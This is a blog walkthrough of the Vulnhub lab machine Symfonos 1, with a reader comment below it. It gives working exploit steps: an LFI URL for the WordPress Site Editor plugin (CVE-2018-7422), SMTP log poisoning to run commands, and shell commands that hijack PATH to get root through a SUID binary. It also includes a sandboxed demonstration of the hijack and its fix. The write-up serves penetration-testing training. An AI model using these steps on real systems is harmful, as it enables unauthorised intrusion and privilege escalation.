Vulnhub – Symfonos 1 Walkthrough

Scanning the box with nmap -A -T4 -p- 192.168.1.11 -vv

The host also runs SMB; we can enumerate it and list the shares:

One of the shares contains a file named attention.txt:

attention.txt lists a few passwords. We can now log in to SMB as helios with one of them; after testing each, qwerty works:

From the helios share we download two more files, research.txt and todo.txt:

They reveal a new path, /h3l105, which is a WordPress site. The site refers to itself as symfonos.local, so map that name to 192.168.1.11 in /etc/hosts before scanning it.

wpscan --url http://192.168.1.11/h3l105/ -e p


wpscan reports that directory listing is enabled on the uploads directory; browsing it shows three sub-directories:

Among the plugins wpscan enumerated is Site Editor; a quick search turns up a known exploit for it, the local file inclusion CVE-2018-7422:

The exploit is a local file inclusion: the ajax_path parameter is passed to an include without any sanitisation, so we can read /etc/passwd:

http://192.168.1.11/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Back in the enumeration phase port 25 (SMTP) was open and has had no use so far. Combined with an LFI it gives us SMTP log poisoning: send helios a mail whose body contains PHP, which the MTA appends to the local spool /var/mail/helios, then include that file through the LFI so the PHP is executed:

Then we put this line in the address bar:

view-source:http://192.168.1.11/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&c=id

The included spool shows up in the page source, with the output of id where the PHP stub was.

To get a shell we replace id in the c parameter with a reverse-shell command:

Let's use find to locate SUID files: find / -perm -u=s -type f 2>/dev/null

There is a SUID binary /opt/statuscheck that runs curl by its bare name, so we can hijack it through PATH: drop a fake curl in a writable directory, put that directory first in PATH and run the binary, which then executes our file with the effective UID of root. On Debian /bin/sh is dash, which keeps the effective UID; if the target's shell is bash, start it with -p so it does not drop privileges.

cd /tmp

echo "/bin/sh" > curl

chmod 755 curl

echo $PATH

export PATH=/tmp:$PATH

/opt/statuscheck
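The PATH hijack above, reproduced in a throwaway sandbox as an added example (not the box's binary or the author's commands). Because a test environment cannot create a SUID root file, a small script that calls curl by bare name stands in for /opt/statuscheck, the fake curl prints a marker instead of spawning /bin/sh, and a hardened variant of the same script shows the fix: pin PATH to trusted directories (an absolute /usr/bin/curl would work too) before calling curl.

```shell
#!/bin/sh
# Added example, not the author's commands. Stand-ins: "statuscheck" is a plain script
# (not SUID) that resolves curl through PATH, exactly the flaw abused on the box; the
# fake curl writes a marker instead of starting /bin/sh so the effect is observable.
setup_sandbox() {
  SANDBOX=$(mktemp -d)
  mkdir -p "$SANDBOX/writable"
  # Vulnerable stand-in for /opt/statuscheck: trusts whatever PATH hands it as "curl".
  cat > "$SANDBOX/statuscheck" <<'EOF'
#!/bin/sh
curl -sI --connect-timeout 2 --max-time 3 http://127.0.0.1 2>/dev/null
EOF
  # Hardened stand-in: fixes PATH to trusted directories first, so an attacker-controlled
  # directory can never be consulted (a SUID program must never inherit the caller's PATH).
  cat > "$SANDBOX/statuscheck_fixed" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
curl -sI --connect-timeout 2 --max-time 3 http://127.0.0.1 2>/dev/null
EOF
  # The attacker's "curl", dropped in a directory they can write to (think /tmp on the box).
  cat > "$SANDBOX/writable/curl" <<'EOF'
#!/bin/sh
echo HIJACKED
EOF
  chmod 755 "$SANDBOX/statuscheck" "$SANDBOX/statuscheck_fixed" "$SANDBOX/writable/curl"
  echo "$SANDBOX"
}

# Run a target with the writable directory prepended to PATH, as the walkthrough does with
# "export PATH=/tmp:$PATH", and return the first line it printed.
run_with_hijacked_path() { # $1 = sandbox dir, $2 = script name
  PATH="$1/writable:$PATH" "$1/$2" | head -n 1
}

# Demo when run directly: the vulnerable script executes the fake curl, the fixed one does not.
SB=$(setup_sandbox)
echo "vulnerable: $(run_with_hijacked_path "$SB" statuscheck)"
echo "hardened:   $(run_with_hijacked_path "$SB" statuscheck_fixed)"
rm -rf "$SB"
```

On the real box the same lookup happens inside a process whose effective UID is root, which is why the bare-name call is a privilege escalation and not just a nuisance.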

2 thoughts on “Vulnhub – Symfonos 1 Walkthrough”

  1. Hi M.Khfaga, thanks for the amazing guide. I’m trying to complete this box to increase my hacking skillsets (hopefully). Could you just help me understand the purpose of adding the symfonos.local host inside /etc/hosts file? Is this a compulsory step? and does it have to be precisely ‘symfonos.local’ or can it just be added in as ‘symfonos’?

